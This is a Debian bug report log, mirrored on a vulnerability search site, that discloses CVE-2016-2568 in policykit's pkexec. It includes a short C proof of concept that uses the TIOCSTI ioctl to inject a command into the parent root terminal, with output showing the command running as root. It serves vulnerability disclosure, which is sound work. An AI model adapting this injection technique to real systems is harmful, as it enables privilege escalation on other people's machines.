Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2016-2568 CVE-2005-4890

Source

Debian Bug report logs - #812512
policykit-1: CVE-2016-2568: Program run via pkexec as unprivileged user can escape to parent session via TIOCSTI ioctl

Package: src:policykit-1; Maintainer for src:policykit-1 is Utopia Maintenance Team <pkg-utopia-maintainers@lists.alioth.debian.org>;

Reported by: up201407890@alunos.dcc.fc.up.pt

Date: Sun, 24 Jan 2016 15:12:02 UTC

Severity: important

Tags: security, upstream

Merged with 816062

Found in version policykit-1/0.105-14.1

Reply or subscribe to this bug.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox

Report forwarded to debian-bugs-dist@lists.debian.org, Utopia Maintenance Team <pkg-utopia-maintainers@lists.alioth.debian.org>:
Bug#812512; Package policykit-1. (Sun, 24 Jan 2016 15:12:05 GMT) (full text, mbox, link).

Acknowledgement sent to up201407890@alunos.dcc.fc.up.pt:
New Bug report received and forwarded. Copy sent to Utopia Maintenance Team <pkg-utopia-maintainers@lists.alioth.debian.org>. (Sun, 24 Jan 2016 15:12:05 GMT) (full text, mbox, link).

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

Package: policykit-1
Version: all
Severity: important
File: /usr/bin/pkexec

When executing a program via "pkexec --user nonpriv program" the  
nonpriv session can escape to the parent session by using the TIOCSTI  
ioctl to push characters into the terminal's input buffer, allowing  
privilege escalation.
This issue has been fixed in "su" CVE-2005-4890 by calling setsid()  
and in "sudo" by using the "use_pty" flag.

$ cat test.c
#include <sys/ioctl.h>

int main()
{
 char *cmd = "id\n";
 while(*cmd)
  ioctl(0, TIOCSTI, cmd++);
}

$ gcc test.c -o test
$ id
uid=1000(saken) gid=1000(saken) groups=1000(saken)

# pkexec --user saken ./test ----> last command i type in
id
# id ----> did not type this
uid=0(root) gid=0(root) groups=0(root)


I don't believe any of the previous mentions of fixes for "su" and  
"sudo" work here, since executing a shell via pkexec would make it not  
have job control.

I'm also requesting a CVE for this issue

Thanks,
Federico Bento

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.

Bug reassigned from package 'policykit-1' to 'src:policykit-1'. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sun, 05 Jun 2016 12:45:06 GMT) (full text, mbox, link).

No longer marked as found in versions all. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sun, 05 Jun 2016 12:45:07 GMT) (full text, mbox, link).

Marked as found in versions policykit-1/0.105-14.1. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sun, 05 Jun 2016 12:45:08 GMT) (full text, mbox, link).

Added tag(s) security and upstream. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sun, 05 Jun 2016 12:45:09 GMT) (full text, mbox, link).

Merged 812512 816062 Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sun, 05 Jun 2016 12:45:10 GMT) (full text, mbox, link).

Information forwarded to debian-bugs-dist@lists.debian.org, Utopia Maintenance Team <pkg-utopia-maintainers@lists.alioth.debian.org>:
Bug#812512; Package src:policykit-1. (Tue, 07 Jun 2016 09:42:04 GMT) (full text, mbox, link).

Acknowledgement sent to Adam Maris <amaris@redhat.com>:
Extra info received and forwarded to list. Copy sent to Utopia Maintenance Team <pkg-utopia-maintainers@lists.alioth.debian.org>. (Tue, 07 Jun 2016 09:42:04 GMT) (full text, mbox, link).

Message #20 received at 812512@bugs.debian.org (full text, mbox, reply):

[Message part 1 (text/plain, inline)]

CVE (CVE-2016-2568) for this issue was already assigned here:

http://seclists.org/oss-sec/2016/q1/443

Regards,

-- 
Adam Mariš, Red Hat Product Security
1CCD 3446 0529 81E3 86AF  2D4C 4869 76E7 BEF0 6BC2

[Message part 2 (text/html, inline)]

Changed Bug title to 'policykit-1: CVE-2016-2568: Program run via pkexec as unprivileged user can escape to parent session via TIOCSTI ioctl' from 'pkexec tty hijacking via TIOCSTI ioctl'. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Wed, 08 Jun 2016 14:09:08 GMT) (full text, mbox, link).

Send a report that this bug log contains spam.

Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 18:08:01 2019; Machine Name: beach

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

policykit-1: CVE-2016-2568: Program run via pkexec as unprivileged user can escape to parent session via TIOCSTI ioctl

Debian Bug report logs - #812512
policykit-1: CVE-2016-2568: Program run via pkexec as unprivileged user can escape to parent session via TIOCSTI ioctl

Vulmon Search

About

Products

Connect

policykit-1: CVE-2016-2568: Program run via pkexec as unprivileged user can escape to parent session via TIOCSTI ioctl

Debian Bug report logs - #812512 policykit-1: CVE-2016-2568: Program run via pkexec as unprivileged user can escape to parent session via TIOCSTI ioctl

Vulmon Search

About

Products

Connect

Debian Bug report logs - #812512
policykit-1: CVE-2016-2568: Program run via pkexec as unprivileged user can escape to parent session via TIOCSTI ioctl